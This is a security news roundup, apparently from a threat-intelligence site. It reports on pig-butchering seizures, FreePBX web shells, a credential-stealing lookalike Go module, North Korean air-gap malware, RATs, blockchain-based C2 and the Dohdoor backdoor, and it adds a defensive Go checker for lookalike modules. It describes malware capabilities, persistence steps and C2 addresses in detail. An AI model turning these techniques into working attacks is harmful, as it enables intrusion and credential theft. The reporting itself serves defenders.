2026-02-28 AI Startup News

DoJ Seizes $61 Million in Tether Linked to Pig Butchering Crypto Scams

The U.S. Department of Justice (DoJ) this week announced the seizure of $61 million worth of Tether that was allegedly associated with bogus cryptocurrency schemes known as pig butchering. The confiscated funds were traced to cryptocurrency addresses used for the laundering of criminally derived proceeds stolen from victims of cryptocurrency investment scams, the department added. “Criminal actors and professional money launderers use cyber-enabled fraud schemes to swindle their victims and conceal their ill-gotten gains,” said HSI Charlotte Acting Special Agent in Charge Kyle D. Burns. “HSI special agents work diligently to trace the illicit proceeds of crime across the globe to disrupt and dismantle the transnational criminal organizations that seek to defraud hardworking Americans.”

As is the norm in such cybercrime operations, threat actors are known to target individuals by cultivating romantic relationships after approaching them on dating and social media messaging apps. These activities are carried out by individuals who are trafficked into scam compounds operating primarily in Southeast Asia with promises of high-paying jobs. The cybercrime syndicates behind the scams then confiscate their passports, and the trafficked workers are coerced into conning victims online by posing as charming strangers or brokers on investment platforms, or face brutal consequences.

The end goal is to coax unsuspecting users into parting with their hard-earned money in fraudulent cryptocurrency investment schemes. According to the DoJ, the fake platforms displayed made-up investment portfolios displaying unusually high returns in a deliberate attempt to make victims invest more of their funds. The reality hits when users try to withdraw their funds, at which point they are asked to pay an extra fee as a way to extract even more money from them. “Once the victims’ money transferred to a cryptocurrency wallet under the scammers’ control, the crooks quickly routed that money through many other wallets to hide the nature, source, control, and ownership of that stolen money,” the department added.

In a coordinated announcement, Tether said it has frozen around $4.2 billion in assets linked to illicit activity to date, including nearly $250 million related to scam networks since June 2025 alone. Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

900+ Sangoma FreePBX Instances Compromised in Ongoing Web Shell Attacks

The Shadowserver Foundation has revealed that over 900 Sangoma FreePBX instances still remain infected with web shells as part of attacks that exploited a command injection vulnerability starting in December 2025. Of these, 401 instances are located in the U.S., followed by 51 in Brazil, 43 in Canada, 40 in Germany, and 36 in France. The non-profit entity said the compromises are likely accomplished via the exploitation of CVE-2025-64328 (CVSS score: 8.6), a high-severity security flaw that could enable post-authentication command injection. “The impact is that any user with access to the FreePBX Administration panel could leverage this vulnerability to execute arbitrary shell commands on the underlying host,” FreePBX said in an advisory for the flaw in November 2025.

“An attacker could leverage this to obtain remote access to the system as the asterisk user.” The vulnerability affects FreePBX versions 17.0.2.36 and higher. It was resolved in version 17.0.3. As mitigations, it’s advised to add security controls to ensure that only authorized users have access to the FreePBX Administrator Control Panel (ACP), restrict access to the ACP from hostile networks, and update the filestore module to the latest version. The vulnerability has since come under active exploitation in the wild, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add it to its Known Exploited Vulnerabilities (KEV) catalog earlier this month.

Source: The Shadowserver Foundation

In a report published late last month, Fortinet FortiGuard Labs revealed that the threat actor behind the cyber fraud operation codenamed INJ3CTOR3 has been exploiting CVE-2025-64328 since early December 2025 to deliver a web shell codenamed EncystPHP. “By leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges, enabling arbitrary command execution on the compromised host and initiating outbound call activity through the PBX environment,” the cybersecurity company noted. FreePBX users are recommended to update their FreePBX deployments to the latest version as soon as possible to counter active threats.


Malicious Go Crypto Module Steals Passwords, Deploys Rekoobe Backdoor

Cybersecurity researchers have disclosed details of a malicious Go module that’s designed to harvest passwords, create persistent access via SSH, and deliver a Linux backdoor named Rekoobe. The Go module, github[.]com/xinfeisoft/crypto, impersonates the legitimate “golang.org/x/crypto” codebase, but injects malicious code that exfiltrates secrets entered via terminal password prompts to a remote endpoint, fetches a shell script in response, and executes it. “This activity fits namespace confusion and impersonation of the legitimate golang.org/x/crypto subrepository (and its GitHub mirror github.com/golang/crypto),” Socket security researcher Kirill Boychenko said. “The legitimate project identifies go.googlesource.com/crypto as canonical and treats GitHub as a mirror, a distinction the threat actor abuses to make github.com/xinfeisoft/crypto look routine in dependency graphs.” Specifically, the backdoor has been placed within the “ssh/terminal/terminal.go” file, so that every time a victim application invokes ReadPassword() – the function meant to read input like passwords from a terminal – the hook captures the interactive secret.

The main responsibility of the downloaded script is to function as a Linux stager: it appends a threat actor’s SSH key to the “/home/ubuntu/.ssh/authorized_keys” file, sets iptables default policies to ACCEPT in an attempt to loosen firewall restrictions, and retrieves additional payloads from an external server while disguising them with the .mp5 extension. Of the two payloads, one is a helper that tests internet connectivity and attempts to communicate with an IP address (“154.84.63[.]184”) over TCP port 443. The program likely functions as a recon or loader, Socket noted. The second downloaded payload has been assessed to be Rekoobe, a known Linux trojan that has been detected in the wild since at least 2015.

The backdoor is capable of receiving commands from an attacker-controlled server to download more payloads, steal files, and execute a reverse shell. As recently as August 2023, Rekoobe has been put to use by Chinese nation-state groups like APT31 . While the package still remains listed on pkg.go.dev, the Go security team has taken steps to block the package as malicious. “This campaign will likely repeat because the pattern is low-effort and high-impact: a lookalike module that hooks a high-value boundary (ReadPassword), uses GitHub Raw as a rotating pointer, then pivots into curl | sh staging and Linux payload delivery,” Boychenko said.

“Defenders should anticipate similar supply chain attacks targeting other ‘credential edge’ libraries (SSH helpers, CLI auth prompts, database connectors) and more indirection through hosting surfaces to rotate infrastructure without republishing code.”
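As an added example (not Socket’s tooling and not code from the malicious module), the following Go program implements the dependency-graph check that the namespace-confusion angle in Socket’s report calls for: it parses a go.mod and flags require entries whose final path element matches a golang.org/x repository name but whose module path is neither golang.org/x/<name> nor the github.com/golang/<name> mirror. The repository-name list and the sample go.mod, including its version strings, are constructed for the demonstration.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// xRepos lists golang.org/x subrepository names that a lookalike module
// might borrow; "crypto" is the one abused in the Socket report.
// The list is an assumption and can be extended to the full x/ family.
var xRepos = map[string]bool{
	"crypto": true, "net": true, "sys": true, "term": true, "text": true, "oauth2": true,
}

// Finding is one require entry that deserves a human look.
type Finding struct {
	Module   string // module path as written in go.mod
	Version  string
	Expected string // canonical path the final element resembles
}

// isCanonical accepts the golang.org/x path and the official GitHub mirror
// (github.com/golang/<name>) that the legitimate project documents.
func isCanonical(path, name string) bool {
	return path == "golang.org/x/"+name || path == "github.com/golang/"+name
}

// FindLookalikes scans go.mod text and returns require entries whose final
// path element matches an x/ repository name but whose module path is
// neither canonical nor the official mirror (namespace confusion).
func FindLookalikes(gomod string) []Finding {
	var out []Finding
	inBlock := false
	sc := bufio.NewScanner(strings.NewReader(gomod))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if i := strings.Index(line, "//"); i >= 0 { // drop comments such as "// indirect"
			line = strings.TrimSpace(line[:i])
		}
		switch {
		case line == "":
			continue
		case line == "require (":
			inBlock = true
			continue
		case inBlock && line == ")":
			inBlock = false
			continue
		}
		fields := strings.Fields(line)
		var path, ver string
		switch {
		case inBlock && len(fields) >= 2:
			path, ver = fields[0], fields[1]
		case !inBlock && len(fields) >= 3 && fields[0] == "require":
			path, ver = fields[1], fields[2]
		default:
			continue // module, go, replace and exclude lines are not requires
		}
		name := path[strings.LastIndex(path, "/")+1:]
		if xRepos[name] && !isCanonical(path, name) {
			out = append(out, Finding{path, ver, "golang.org/x/" + name})
		}
	}
	return out
}

// Constructed go.mod for demonstration; the version strings are placeholders.
const sampleGoMod = `module example.com/app

go 1.22

require (
	github.com/xinfeisoft/crypto v0.0.0-20260101000000-abcdef123456 // indirect
	golang.org/x/crypto v0.31.0
	github.com/golang/net v0.0.0-20240101000000-0123456789ab
	github.com/spf13/cobra v1.8.0
)

require golang.org/x/sys v0.28.0
`

func main() {
	for _, f := range FindLookalikes(sampleGoMod) {
		fmt.Printf("REVIEW %s %s: resembles %s\n", f.Module, f.Version, f.Expected)
	}
}
```

Run it against a real go.mod by replacing sampleGoMod with the file contents; the official mirror path is deliberately not flagged, only paths under other accounts.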


ScarCruft Uses Zoho WorkDrive and USB Malware to Breach Air-Gapped Networks

The North Korean threat actor known as ScarCruft has been attributed to a fresh set of tools, including a backdoor that uses Zoho WorkDrive for command-and-control (C2) communications to fetch more payloads and an implant that uses removable media to relay commands and breach air-gapped networks. The campaign, codenamed Ruby Jumper by Zscaler ThreatLabz, involves the deployment of malware families such as RESTLEAF, SNAKEDROPPER, THUMBSBD, VIRUSTASK, FOOTWINE, and BLUELIGHT to facilitate surveillance on a victim’s system. It was discovered by the cybersecurity company in December 2025. “In the Ruby Jumper campaign, when a victim opens a malicious LNK file, it launches a PowerShell command and scans the current directory to locate itself based on file size,” security researcher Seongsu Park said.

“Then, the PowerShell script launched by the LNK file carves multiple embedded payloads from fixed offsets within that LNK, including a decoy document, an executable payload, an additional PowerShell script, and a batch file.” One of the lure documents used in the campaign displays an article about the Palestine-Israel conflict that’s translated from a North Korean newspaper into Arabic. All three remaining payloads are used to progressively move the attack to the next stage, with the batch script launching PowerShell, which, in turn, is responsible for loading shellcode containing the payload after decrypting it. The Windows executable payload, named RESTLEAF, is spawned in memory and uses Zoho WorkDrive for C2, marking the first time the threat actor has abused the cloud storage service in its attack campaigns. Once it’s successfully authenticated with the Zoho WorkDrive infrastructure by means of a valid access token, RESTLEAF downloads shellcode, which is then executed via process injection, eventually leading to the deployment of SNAKEDROPPER, which installs the Ruby runtime, sets up persistence using a scheduled task, and drops THUMBSBD and VIRUSTASK.

THUMBSBD is disguised as a Ruby file and uses removable media to relay commands and transfer data between internet-connected and air-gapped systems. It’s capable of harvesting system information, downloading a secondary payload from a remote server, exfiltrating files, and executing arbitrary commands. If the presence of any removable media is detected, the malware creates a hidden folder and uses it to stage operator-issued commands or store execution output. One of the payloads delivered by THUMBSBD is FOOTWINE, an encrypted payload with an integrated shellcode launcher that comes fitted with keylogging and audio and video capturing capabilities to conduct surveillance.

It communicates with a C2 server using a custom binary protocol over TCP. The complete set of commands supported by the malware is as follows:

- sm, for an interactive command shell
- fm, for file and directory manipulation
- gm, for managing plugins and configuration
- rm, for modifying the Windows Registry
- pm, for enumerating running processes
- dm, for taking screenshots and capturing keystrokes
- cm, for performing audio and video surveillance
- s_d, for receiving batch script contents from the C2 server, saving it to the file %TEMP%\SSMMHH_DDMMYYYY.bat, and executing it
- pxm, for setting up a proxy connection and relaying traffic bidirectionally
- [filepath], for loading a given DLL

THUMBSBD is also designed to distribute BLUELIGHT, a backdoor attributed to ScarCruft since at least 2021. The malware weaponizes legitimate cloud providers, including Google Drive, Microsoft OneDrive, pCloud, and BackBlaze, for C2 to run arbitrary commands, enumerate the file system, download additional payloads, upload files, and remove itself.

Also delivered as a Ruby file, VIRUSTASK functions similarly to THUMBSBD in that it acts as a removable media propagation component to spread the malware to non-infected air-gapped systems. “Unlike THUMBSBD which handles command execution and exfiltration, VIRUSTASK focuses exclusively on weaponizing removable media to achieve initial access on air-gapped systems,” Park explained. “The Ruby Jumper campaign involves a multi-stage infection chain that begins with a malicious LNK file and utilizes legitimate cloud services (like Zoho WorkDrive, Google Drive, Microsoft OneDrive, etc.) to deploy a novel, self-contained Ruby execution environment,” Park said. “Most critically, THUMBSBD and VIRUSTASK weaponize removable media to bypass network isolation and infect air-gapped systems.”

Trojanized Gaming Tools Spread Java-Based RAT via Browser and Chat Platforms

Threat actors are luring unsuspecting users into running trojanized gaming utilities, distributed via browsers and chat platforms, that deliver a remote access trojan (RAT). “A malicious downloader staged a portable Java runtime and executed a malicious Java archive (JAR) file named jd-gui.jar,” the Microsoft Threat Intelligence team said in a post on X. “This downloader used PowerShell and living-off-the-land binaries (LOLBins) like cmstp.exe for stealthy execution.” The attack chain is also designed to evade detection by deleting the initial downloader and by configuring Microsoft Defender exclusions for the RAT components. Persistence is achieved by means of a scheduled task and a Windows startup script named “world.vbs,” before the final payload is deployed on the compromised host.

The malware, per Microsoft, is a “multi-purpose malware” that acts as a loader, runner, downloader, and RAT. Once launched, it connects to an external server at “79.110.49[.]15” for command-and-control (C2) communications, allowing it to exfiltrate data and deploy additional payloads. As ways to defend against the threat, users are advised to audit Microsoft Defender exclusions and scheduled tasks, remove malicious tasks and startup scripts, isolate affected endpoints, and reset credentials for users active on compromised hosts. The disclosure comes as BlackFog disclosed details of a new Windows RAT malware family called Steaelite that was first advertised on criminal forums in November 2025 as a “best Windows RAT” with “fully undetectable” (FUD) capabilities.

It’s compatible with both Windows 10 and 11. Unlike other off-the-shelf RATs sold to criminal actors, Steaelite bundles together data theft and ransomware, packaging them into one web panel, with an Android ransomware module on the way. The panel also incorporates various developer tools to facilitate keylogging, client-to-victim chat, file searching, USB spreading, wallpaper modification, UAC bypass, and clipper functionality. Other notable features include removing competing malware, disabling Microsoft Defender or configuring exclusions, and installing persistence methods.

As for its main capabilities, Steaelite RAT supports remote code execution, file management, live streaming, webcam and microphone access, process management, clipboard monitoring, password theft, installed program enumeration, location tracking, arbitrary file execution, URL opening, DDoS attacks, and VB.NET payload compilation. “The tool gives operators browser-based control over infected Windows machines, covering remote code execution, credential theft, live surveillance, file exfiltration, and ransomware deployment from a single dashboard,” security researcher Wendy McCague said. “A single threat actor can browse files, exfiltrate documents, harvest credentials, and deploy ransomware from the same dashboard. This enables complete double extortion from one tool.” In recent weeks, threat hunters have also discovered two new RAT families tracked as DesckVB RAT and KazakRAT that enable comprehensive remote control over infected hosts and even selectively deploy capabilities post-compromise.

According to Ctrl Alt Intel, KazakRAT is suspected to be the work of a state-affiliated cluster targeting Kazakh and Afghan entities as part of a persistent campaign ongoing since at least August 2022.

Meta Files Lawsuits Against Brazil, China, Vietnam Advertisers Over Celeb-Bait Scams

Meta on Thursday said it’s taking legal action to tackle scams on its platforms by filing lawsuits against what it calls deceptive advertisers based in Brazil, China, and Vietnam. As part of the effort, the advertisers’ methods of payment have been suspended, related accounts have been disabled, and the website domain names used to pull off the scams have been blocked. Concurrently, the social media giant said it has also issued cease and desist letters to eight marketing consultants who advertised the ability to bypass its ad policy enforcement systems. This included fake “un-ban” or account restoration services and renting access to trusted accounts so as to help clients bypass its controls.

At least three advertisers, two from Brazil and one from China, were found to engage in celeb-bait scams, which often involve misusing the image of well-known figures to trick people into clicking on bogus ads that lead to scam sites. These websites are designed to harvest sensitive data or dupe unsuspecting users into sending money or investing in fake platforms. The three advertisers against whom Meta has filed lawsuits are listed below:

- Brazil-based Vitor Lourenço de Souza and Milena Luciani Sanchez, sued for using altered images and voices of celebrities to promote fraudulent healthcare products.
- Brazil-based B&B Suplementos e Cosméticos Ltda. (Brites Corp), Brites Academia de Treinamento Ltda., Daniel de Brites Macieira Cordeiro, and José Victor de Brites Chaves de Araújo, for being part of a scam operation that leveraged synthetic imagery of a prominent physician to advertise healthcare products without regulatory approval and sold courses teaching the same tactics.
- China-based Shenzhen Yunzheng Technology Co., Ltd, for using celeb-bait ads to target people in various countries, including the U.S. and Japan, as part of a fraud scheme designed to lure them into joining investment groups.

“To fight celeb-bait scams, we developed protections for celebrities whose images are repeatedly used in these schemes,” Meta said.

“This program currently protects the images of more than 500,000 celebrities and public figures around the world.” In addition, the company noted that it sued Vietnam-based advertiser Lý Văn Lâm for using cloaking techniques to get around its review process. Cloaking refers to an adversarial technique that conceals the true nature of a website linked to an ad in an attempt to fool ad review systems, by serving one version of its content during the review and showing entirely different, malicious content to real users. In this case, the advertiser is said to have used scam ads to offer discounted items from well-known brands in exchange for completing a survey. People who interacted with these ads were taken to phony websites where they were asked to enter credit card information to purchase items that were never delivered.

Their credit cards also incurred unauthorized, recurring fees, a practice known as subscription fraud. The development comes months after a Reuters investigation found that 19% of Meta’s $18 billion in ad sales in China in 2024 came from ads for scams, illegal gambling, pornography, and other banned content. The report also uncovered agencies that allow businesses to run banned advertisements, prompting the company to put its Badged Partners program under review. In an analysis of 14.5 million ads running on Meta platforms across the E.U. and U.K. over a 23-day period, Gen Digital found that nearly one in three of those ads (about 30.99%) pointed to a scam, phishing, or malware link. “In total, scam ads generated more than 300 million impressions in less than a month,” the cybersecurity company said earlier this month. “The activity was highly concentrated, with just 10 advertisers responsible for over 56% of all observed scam ads. Repeated campaign clusters were traced to shared payment and infrastructure linked to China and Hong Kong, indicating organized, industrial-scale operations rather than isolated bad actors.”

These findings also coincide with the discovery of malicious infrastructure and underground services that have been used to peddle various kinds of scams:

- Scams have been found to combine malvertising and pig butchering fraud models to defraud victims, primarily those in Japan, by tricking them into clicking on investment-themed ads on social media. These ads redirect victims to websites that prompt them to engage with a supposed expert via messaging apps by scanning a QR code. Once victims are added to one-on-one and group chats with these so-called experts, who are nothing but artificial intelligence (AI)-powered chatbots in some cases, they are persuaded to invest progressively larger amounts of money, only for the operators to demand a “release fee” to unlock non-existent profits. More than 23,000 domains within this ecosystem have been discovered.
- Threat actors are compromising routers to alter DNS settings to use shadow resolvers hosted in Aeza International, a bulletproof hosting (BPH) company sanctioned by the U.S. Government in July 2025. This unauthorized modification is engineered to selectively alter DNS responses associated with Okta and Shopify, allowing the operators to direct users to scam and malware content by means of an HTTP-based traffic distribution system (TDS).
- A malicious push notification network has been observed using a network of malicious domains to target Android Chrome users all over the world with a steady stream of unwanted push notifications (e.g., “Android infected with malware!” or “System needs a scan”) after obtaining permissions, in a bid to direct them to scam sites and adult content. According to data from Infoblox, Bangladesh, India, Indonesia, and Pakistan represented 50% of all the traffic.
- A network of over 150 cloned, fake websites has been identified impersonating real law firms based in the U.S. and the U.K., and targeting users looking for legal advice and representation to promote a business impersonation scam. “The sites used the firm’s name, branding, and publicly available attorney identities, presenting themselves as legitimate legal and asset-recovery services, offering to help victims recover funds lost to prior fraud,” Sygnia said.

“The campaign targeted individuals who had already suffered financial fraud.” The proliferation of scams, fueled by a booming pig butchering-as-a-service (PBaaS) economy, has not escaped law enforcement’s attention, as evidenced by the dismantling of scam compounds in Southeast Asia in recent months. Earlier this month, the Cambodian government promised to crack down on and dismantle cyber scam networks operating within its borders, adding that police officials launched 48 operations in the first nine months of 2025 to combat cyber fraud, arrested 168 people, and deported 2,722 people back to their home countries. The ongoing efforts have cut scam activity in half since the start of this year, Senior Minister Chhay Sinarith, chairman of the Secretariat of the Commission for Combating Technology Crimes, was quoted as saying this week. Cambodian Prime Minister Hun Manet also acknowledged that online scam centres operating in the country are damaging its reputation and undermining its economy.


Aeternum C2 Botnet Stores Encrypted Commands on Polygon Blockchain to Evade Takedown

Cybersecurity researchers have disclosed details of a new botnet loader called Aeternum C2 that uses a blockchain-based command-and-control (C2) infrastructure to make it resilient to takedown efforts. “Instead of relying on traditional servers or domains for command-and-control, Aeternum stores its instructions on the public Polygon blockchain,” Qrator Labs said in a report shared with The Hacker News. “This network is widely used by decentralized applications, including Polymarket, the world’s largest prediction market. This approach makes Aeternum’s C2 infrastructure effectively permanent and resistant to traditional takedown methods.” This is not the first time botnets have been found relying on blockchain for C2.

In 2021, Google said it took steps to disrupt a botnet known as Glupteba that uses the Bitcoin blockchain as a backup C2 mechanism to fetch the actual C2 server address. Details of Aeternum C2 first emerged in December 2025, when Outpost24’s KrakenLabs revealed that a threat actor by the name of LenAI was advertising the malware on underground forums for $200, a price that grants customers access to a panel and a configured build. For $4,000, customers were allegedly promised the entire C++ codebase along with updates. A native C++ loader available in both x32 and x64 builds, the malware works by writing the commands to be issued to infected hosts into smart contracts on the Polygon blockchain.

The bots then read those commands by querying public remote procedure call (RPC) endpoints. All of this is managed via the web-based panel, from where customers can select a smart contract, choose a command type, specify a payload URL and update it. The command, which can target all endpoints or a specific one, is written into the blockchain as a transaction, after which it becomes available to every compromised device that’s polling the network. “Once a command is confirmed, it cannot be altered or removed by anyone other than the wallet holder,” Qrator Labs said.

“The operator can manage multiple smart contracts simultaneously, each one potentially serving a different payload or function, such as a clipper, a stealer, a RAT, or a miner.” According to two-part research published by Ctrl Alt Intel earlier this month, the C2 panel is implemented as a Next.js web application that allows operators to deploy smart contracts to the Polygon blockchain. The smart contracts contain a function that, when called by the malware via the Polygon RPC, returns the encrypted command that’s subsequently decoded and run on the victim machines. Besides using the blockchain to turn it into a takedown-resistant botnet, the malware packs in various anti-analysis features to extend the lifespan of infections. This includes checks to detect virtualized environments, in addition to equipping customers with the ability to scan their builds via Kleenscan to ensure that they are not flagged by antivirus vendors.

“The operational costs are negligible: $1 worth of MATIC, the native token of the Polygon network, is enough for 100 to 150 command transactions,” the Czech cybersecurity vendor said. “The operator doesn’t need to rent servers, register domains, or maintain any infrastructure beyond a crypto wallet and a local copy of the panel.” The threat actor has since attempted to sell the entire toolkit for an asking price of $10,000, claiming a lack of time for support and their involvement in another project. “I will sell the entire project to one person with permission for resale and commercial use, with all ‘rights,’” LenAI wrote in a dark web forum post. “I will also give useful tips/notes on development that I did not have time to implement.” It’s worth noting that LenAI is also behind a second crimeware solution called ErrTraffic that enables threat actors to automate ClickFix attacks by generating fake glitches on compromised websites to induce a false sense of urgency and deceive users into following malicious instructions.

The disclosure comes as Infrawatch published details of an underground service that deploys dedicated laptop hardware into American homes to co-opt the devices into a residential proxy network named DSLRoot that redirects malicious traffic through them. The hardware is designed to run a Delphi-based program called DSLPylon that’s equipped with capabilities to enumerate supported modems on the network, as well as remotely control the residential networking equipment and Android devices via an Android Debug Bridge (ADB) integration. “Attribution analysis identifies the operator as a Belarusian national with residential presence in Minsk and Moscow,” Infrawatch said. “DSLRoot is estimated to operate roughly 300 active hardware devices across 20+ U.S. states.” The operator has been identified as Andrei Holas (aka Andre Holas and Andrei Golas), with the service promoted on BlackHatWorld by a user operating under the alias GlobalSolutions, claiming to offer physical residential ADSL proxies for sale for $190 per month for unrestricted access. It is also available for $990 for six months and $1,750 for annual subscriptions. “DSLRoot’s custom software provides automated remote management of consumer modems (ARRIS/Motorola, Belkin, D-Link, ASUS) and Android devices via ADB, enabling IP address rotation and connectivity control,” the company noted. “The network operates without authentication, allowing clients to route traffic anonymously through U.S. residential IPs.”

UAT-10027 Targets U.S. Education and Healthcare with Dohdoor Backdoor

A previously undocumented threat activity cluster has been attributed to an ongoing malicious campaign targeting education and healthcare sectors in the U.S. since at least December 2025. The campaign is being tracked by Cisco Talos under the moniker UAT-10027. The end goal of the attacks is to deliver a never-before-seen backdoor codenamed Dohdoor.

“Dohdoor utilizes the DNS-over-HTTPS (DoH) technique for command-and-control (C2) communications and has the ability to download and execute other payload binaries reflectively,” security researchers Alex Karkins and Chetan Raghuprasad said in a technical report shared with The Hacker News. Although the initial access vector used in the campaign is currently not known, it’s suspected to involve the use of social engineering phishing techniques, leading to the execution of a PowerShell script. The script then proceeds to download and run a Windows batch script from a remote staging server, which, for its part, facilitates the download of a malicious Windows dynamic-link library (DLL) that’s named “propsys.dll” or “batmeter.dll.” The DLL payload – i.e., Dohdoor – is launched by means of a legitimate Windows executable (e.g., “Fondue.exe,” “mblctr.exe,” and “ScreenClippingHost.exe”) using a technique referred to as DLL side-loading. The backdoor access created by the implant is used to retrieve a next-stage payload directly into the victim’s memory and execute it.

The payload is assessed to be a Cobalt Strike Beacon. “The threat actor hides the C2 servers behind the Cloudflare infrastructure, ensuring that all outbound communication from the victim machine appears as legitimate HTTPS traffic to a trusted global IP address,” Talos said. “This technique bypasses DNS-based detection systems, DNS sinkholes, and network traffic analysis tools that monitor suspicious domain lookups, ensuring that the malware’s C2 communications remain stealth by traditional network security infrastructure.” Dohdoor has also been found to unhook system calls to bypass endpoint detection and response (EDR) solutions that monitor Windows API calls through user-mode hooks in NTDLL.dll . Raghuprasad told The Hacker News that, “the attacker had infected several educational institutions, including a university that is connected to several other institutions, indicating a potential wider attack surface.

Additionally, one of the affected entities was a healthcare facility, specifically for elderly care.” Analysis of the campaign has revealed no evidence of data exfiltration to date. Although no final payloads have been observed other than what appears to be the Cobalt Strike Beacon to backdoor into the victim’s environment, it’s believed that UAT-10027’s actions are likely driven by financial gain based on the victimology pattern, the researcher added. There is currently no clarity on who is behind UAT-10027, but Cisco Talos said it found some tactical similarities between Dohdoor and LazarLoader , a downloader previously identified as used by the North Korean hacking group Lazarus in attacks aimed at South Korea. “While UAT-10027’s malware shares technical overlaps with the Lazarus Group, the campaign’s focus on the education and health care sectors deviates from Lazarus’ typical profile of cryptocurrency and defense targeting,” Talos concluded.

“However, […] North Korean APT actors have targeted the healthcare sector using Maui ransomware, and another North Korean APT group, Kimsuky, has targeted the education sector, highlighting the overlaps in the victimology of UAT-10027 with that of other North Korean APTs.” Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

ThreatsDay Bulletin: Kali Linux + Claude, Chrome Crash Traps, WinRAR Flaws, LockBit & 15+ Stories

Nothing here looks dramatic at first glance. That’s the point. Many of this week’s threats begin with something ordinary, like an ad, a meeting invite, or a software update. Behind the scenes, the tactics are sharper.

Access happens faster. Control is established sooner. Cleanup becomes harder. Here is a quick look at the signals worth paying attention to.

AI-powered command execution: Kali Linux Integrates Claude AI Assistant via MCP
Kali Linux, an advanced penetration testing Linux distribution used for ethical hacking and network security assessments, has added an integration with Anthropic’s Claude large language model through the Model Context Protocol (MCP) to issue commands in natural language and translate them into technical commands.

Belarus-linked Android spyware: ResidentBat Infrastructure Analyzed
ResidentBat is an Android spyware implant used by Belarusian authorities for surveillance operations against journalists and civil society. Once installed, it provides operators with access to call logs, microphone recordings, SMS, encrypted messenger traffic, screen captures, and locally stored files. The malware, although first documented in December 2025, is assessed to date back to 2021.

According to Censys, ResidentBat-associated infrastructure is concentrated in Europe and Russia: the Netherlands (5 hosts), Germany (2 hosts), Switzerland (2 hosts), and Russia (1 host) in a recent Platform view, using a narrow port range (7000-7257) for control traffic.

Crypto phishing wave: Phishing Campaigns Impersonate Bitpanda
Phishing campaigns are impersonating cryptocurrency brokerage services like Bitpanda to harvest sensitive data, under the pretext that users must reconfirm their information or risk having their accounts blocked. “Attempting to get multiple forms of information and identification, the attackers used tactics that would seem legitimate to the everyday user,” Cofense said. “User information such as name verification, email, and password credentials, and location were all used in this attempt to harvest information under the guise of a multi-factor authentication process.”

Breakout times shrink: Adversaries Get Faster in 2025
In its 2026 Global Threat Report, CrowdStrike said adversaries became faster than ever before in 2025.

“The average e-crime breakout time — the period between initial access and lateral movement onto another system — dropped to 29 minutes, a 65% increase in speed from 2024,” the company said. One such intrusion undertaken by Luna Moth (aka Chatty Spider) targeting a law firm moved from initial access to data exfiltration in four minutes. Chief among the factors fueling this dramatic acceleration was the widespread abuse of legitimate credentials, which allowed attackers to blend into normal network traffic and bypass many traditional security controls. This was coupled with threat actors of varied motivations utilizing AI technology to accelerate and optimize their existing techniques.

Some of the threat actors that have leveraged AI in their operations include Fancy Bear, Punk Spider (aka Akira), Blind Spider (aka Blind Eagle), Odyssey Spider (aka TA558), and an India-nexus hacking group called Frantic Tiger that has used Netlify and Cloudflare pages for credential-harvesting operations. The cybersecurity company said it observed an 89% increase in the number of attacks by AI-enabled adversaries compared to 2024 and a 42% year-over-year increase in zero-days exploited prior to public disclosure. In tandem, 67% of vulnerabilities exploited by China-nexus adversaries provided immediate system access, and 40% targeted edge devices that typically lack comprehensive monitoring. The vast majority of attacks, 82%, were free of malware — highlighting attackers’ enduring shift toward hands-on-keyboard operations and the abuse of legitimate tools and credentials.

4-minute lateral movement: Fastest Attacker Breakout Time Drops to 4 Minutes
In a similar report, ReliaQuest said the fastest intrusions reached lateral movement in just 4 minutes, an 85% acceleration from last year, with data exfiltration taking place in 6 minutes. The statistic is fueled by attackers increasingly weaving AI and automation into their tradecraft. “As attackers increasingly secure valid credentials with elevated privileges, the time to react has drastically dropped,” ReliaQuest said. “In 2025, the average breakout time (initial access to lateral movement) dropped to 34 minutes.

In 47% of incidents, they secured high privileges before ever touching the network. This allows them to skip escalation, blend into traffic, and repurpose legitimate tools.”

ClickFix fuels Mac stealers: Mac Users Targeted by Stealer Malware Using ClickFix
Mac users searching for popular software like Homebrew, 7-Zip, Notepad++, LibreOffice, and Final Cut Pro are the target of an active malvertising campaign powered by at least 35 hijacked Google advertiser accounts originating from countries including the U.S., Canada, Italy, Poland, Brazil, India, Saudi Arabia, Japan, China, Romania, Malta, Slovenia, Germany, the U.K., and the U.A.E. More than 200 malicious advertisements impersonating legitimate macOS software have been found. The end goal of these efforts is to direct users to fake pages that contain ClickFix-like instructions to deliver MacSync stealer.

Another ClickFix campaign has been observed using fake CAPTCHA verification lures on bogus phishing pages to distribute stealer malware that can harvest data from web browsers, gaming apps like Steam, cryptocurrency wallets, and VPN apps. According to ReliaQuest data, a quarter of attacks used social engineering for initial access last year, with ClickFix responsible for delivering 59% of the top malware families.

Encryption debate resurfaces: Meta Executive Warned Against Encryption in Messenger and Instagram
Meta went ahead with a plan to encrypt the messaging services connected to its Facebook and Instagram apps despite internal warnings that it would hinder the social media giant’s ability to flag child-exploitation cases to law enforcement, Reuters reported. The internal chat exchange dated March 2019 was filed in connection with a lawsuit brought by the U.S. state of New Mexico, accusing it of exposing children and teens to sexual exploitation on its platforms and profiting from it. In response to the concerns raised, Meta said it worked on additional safety features before it launched encrypted messaging on Facebook and Instagram in 2023.

ActiveMQ flaw aids LockBit: Apache ActiveMQ Exploit Leads to LockBit Ransomware
Threat actors are exploiting a now-patched security flaw in internet-facing Apache ActiveMQ servers (CVE-2023-46604) to deploy LockBit ransomware. “Despite being evicted after the initial intrusion, they successfully breached the same server on a second occasion 18 days later,” The DFIR Report said.

“After compromising the server, the threat actor used Metasploit, possibly along with Meterpreter, to perform post-exploitation activities. These activities included escalating privileges, accessing LSASS process memory, and moving laterally across the network. After regaining access following their eviction, the threat actor swiftly transitioned to deploying ransomware. They leveraged credentials extracted during their previous breach to deploy LockBit ransomware via RDP.” The ransomware is suspected to be crafted using the leaked LockBit builder.

Chrome crash-to-command trick: CrashFix Variants Detailed
